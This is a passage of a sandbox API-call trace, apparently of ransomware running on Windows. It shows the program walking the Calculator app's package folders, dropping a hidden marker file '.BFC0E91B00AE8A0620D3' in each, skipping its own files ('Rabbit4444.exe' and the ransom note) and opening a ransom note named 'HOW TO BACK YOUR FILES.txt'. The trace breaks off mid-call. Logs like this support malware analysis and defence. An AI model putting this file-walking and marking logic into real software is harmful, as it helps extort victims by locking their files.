lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState" [0064.320] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123500 | out: hHeap=0xe0000) returned 1 [0064.320] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0064.320] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState" [0064.320] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\" [0064.320] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0064.320] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.322] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.324] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.325] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.326] CloseHandle (hObject=0x2cc) returned 1 [0064.326] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState") returned 91 [0064.326] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.326] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16ea38a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefaa5c73, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0064.326] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.326] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.326] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.326] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.326] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16ea38a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefaa5c73, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.326] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.326] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.326] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.327] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.327] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.327] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefaa5c73, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefaa5c73, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefaa5c73, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.327] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.327] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.327] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefaa5c73, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefaa5c73, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefaa5c73, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.327] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0064.327] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.327] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.328] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.328] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.328] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.328] CloseHandle (hObject=0x2a0) returned 1 [0064.329] CloseHandle (hObject=0x2cc) returned 1 [0064.329] GetCurrentThreadId () returned 0xd98 [0064.329] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0064.329] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache" [0064.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1232c0 | out: hHeap=0xe0000) returned 1 [0064.329] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0064.329] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache" [0064.329] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\" [0064.329] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0064.329] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.330] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.332] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.333] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.333] CloseHandle (hObject=0x2cc) returned 1 [0064.334] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache") returned 91 [0064.334] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.334] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c54ad1b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e9f95, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefaa5c73, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0064.334] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.334] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.334] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.334] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.334] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c54ad1b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e9f95, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefaa5c73, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.334] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.334] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.334] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.334] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.334] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.334] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefaa5c73, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefaa5c73, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefaa5c73, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.334] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.335] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.335] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefaa5c73, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefaa5c73, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefaa5c73, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.335] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0064.335] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.335] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.335] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.335] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.336] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.336] CloseHandle (hObject=0x2a0) returned 1 [0064.336] CloseHandle (hObject=0x2cc) returned 1 [0064.336] GetCurrentThreadId () returned 0xd98 [0064.336] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122208 [0064.336] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData" [0064.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123200 | out: hHeap=0xe0000) returned 1 [0064.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0064.336] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData" [0064.336] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\" [0064.336] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0064.336] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.337] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.340] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.340] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.341] CloseHandle (hObject=0x2cc) returned 1 [0064.341] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData") returned 88 [0064.341] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.341] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c5e36c8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e9b9b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefacdd49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0064.341] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.341] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.341] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.341] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.341] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c5e36c8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e9b9b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefacdd49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.342] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.342] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.342] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.342] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.342] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.342] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefacdd49, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefacdd49, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefacdd49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.342] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.342] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.342] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefacdd49, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefacdd49, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefacdd49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.342] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0064.342] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.342] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.343] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.343] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.343] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.343] CloseHandle (hObject=0x2a0) returned 1 [0064.343] CloseHandle (hObject=0x2cc) returned 1 [0064.343] GetCurrentThreadId () returned 0xd98 [0064.344] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0064.344] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC" [0064.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118028 | out: hHeap=0xe0000) returned 1 [0064.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0064.344] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC" [0064.344] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\" [0064.344] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0064.344] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 